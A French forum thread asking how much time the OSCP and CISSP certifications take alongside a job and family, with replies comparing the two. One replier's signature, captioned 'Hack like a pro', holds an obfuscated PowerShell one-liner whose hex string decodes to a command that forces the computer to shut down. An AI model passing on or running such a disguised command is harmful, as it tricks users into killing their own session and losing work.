Annonce

Réduire
Aucune annonce.

Recherche infos sur certification OSCP

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Recherche infos sur certification OSCP

    Bonjour à tous,

    Je m'adresse à ceux qui ont déjà le courage de passer la certification OSCP.

    Je suis déjà dans l'informatique depuis plus de 15 ans (professionnellement, j'entends). J'ai fait beaucoup de choses : développement, conception, R&D, gestion de projet, etc. Mais il y a toujours un domaine qui m'a attiré, celui du hacking et l'intrusion de système. Je cherche à évoluer dans ce domaine tout en restant en activité. J'ai regardé les formations disponibles sur le marché et les deux formations qui semblent sortir du lot sont OSCP et CISPP mais elles semblent être très consommatrices de temps.

    Ma question est donc simple. Pouvez-vous me dire d'après vos expériences si le passage de ces certification est compatible avec le boulot et une vie de famille :-) ? Combien de temps faut-il se réserver pour espérer réussir ?

    Merci d'avance à tous pour vos retours

    BenGee

  • #2
    Envoyé par BenGee Voir le message
    Combien de temps faut-il se réserver pour espérer réussir ?
    Je crois que tu trouvera des réponses en lisant là ==> https://hackademics.fr/forum/orienta...d-professional
    <?php
    $signature = NULL;
    ?>

    Commentaire


    • #3
      Mahi2 J'ai déjà lu ce thread. Si j'y avais trouvé la réponse, je n'aurais pas posé la question dans un post séparé. D'ailleurs, le dernier post émis sur le thread indiqué est le mien. Ma question va plus loin. Elle concerne le temps et l'investissement requis lorsque l'on doit bosser en même temps et aussi s'occuper de sa famille.

      Commentaire


      • #4
        Dommage qu'il n'y ai pas de réponse concrète mais je pense que ça demande des sacrifices niveau vie de famille surtout mais bon c'est temporaire au max ça te prends 90j à être à fond le soir et les weekends, si c'est ton objectif alors ta famille comprendra le jeu en vaut la chandelle

        Commentaire


        • #5
          Hello,

          OSCP et CISSP sont des certifs très différentes :

          OSCP est exclusivement technique et orientée Pentest (Enum -> recherche de vuln -> exploitation -> rapport).
          Le job visé avec cette certif, c'est clairement Pentester (Et c'est certainement la certif la plus recherchée pour ce job d'ailleurs).
          Coté investissement : Tout dépend de quel niveau tu pars, mais 3 mois de labs ne sont pas de trop, à raison de 2h / jours, et un peu plus le week end. Clairement, ça va te rajouter +- 20h de taff par semaines pendant 3 mois, ce qui n'est pas négligeable : parle en à ta femme AVANT

          CISSP est une certif bien plus orientée archi / Orga (et finalement assez peu technique), elle est très demandée pour un profile de type RSSI orienté technique. Elle sert un peu de pont entre le monde pur technique, et le monde pur orga (ISO 27001, COBIT, ITIL, ...)
          Si elle demande de l'investissement, ce n'est en rien comparable avec l'OSCP. (pas vraiment d'échelle d temps à donner, mais l'exam c'est un QCM qui porte sur 8 domaines bien distincts, disons que je champ de révision est LARGE, mais ça reste un QCM...) (Faut aussi prendre en compte que c'est une certif qui doit se maintenir activement sur la durée en justifiant de suivi de formations / participation à des événements / publication d'articles, ... )

          Choisir entre ces deux certifs revient donc à choisir entre deux projets professionnels.

          ./Kriss
          Dernière modification par Krisscool, 28 avril 2017, 14h18.
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire

          Chargement...
          X